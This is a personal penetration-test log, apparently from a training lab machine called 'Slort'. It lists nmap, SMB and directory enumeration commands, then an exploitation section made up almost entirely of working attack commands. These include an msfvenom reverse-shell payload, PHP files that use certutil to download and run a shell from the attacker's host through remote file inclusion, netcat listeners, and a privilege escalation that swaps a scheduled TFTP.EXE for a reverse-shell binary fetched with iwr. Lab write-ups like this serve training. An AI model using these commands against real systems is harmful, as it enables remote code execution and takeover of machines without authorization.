Slort

๐Ÿงช Pentest Log: {{date:2025-08-04}}

๐Ÿ” Target Information

ip=192.168.223.53

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

FileZilla Server version 0.9.41 beta

Port 135

rpcclient -U '' -N $ip

Port 139/445

smbclient -L \\\\$ip\\

enum4linux -a $ip

Port 3306

Port 4443

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Port 8080

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

๐Ÿ’ฃ Exploitation / Foothold

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.163 LPORT=4444 -f exe -o shell2.exe

mousepad step1.php

<?php 
$exec = system('certutil.exe -urlcache -split -f "http://192.168.45.163/shell.exe" shell.exe', $val); 
?>

mousepad step2.php

<?php 
$exec = system('shell.exe', $val); 
?>


python3 -m http.server 80

curl http://192.168.223.53:4443/site/index.php?page=http://192.168.45.163/step1.php

nc -lvnp 4444

curl http://192.168.223.53:4443/site/index.php?page=http://192.168.45.163/step2.php

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

Manual:

type C:\backup\info.txt

found

Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.163 LPORT=1234 -f exe -o shell2.exe

move TFTP.exe TFTP.exe.bak

iwr -uri http://192.168.45.163/shell2.exe -Outfile TFTP.exe

nc -lvnp 1234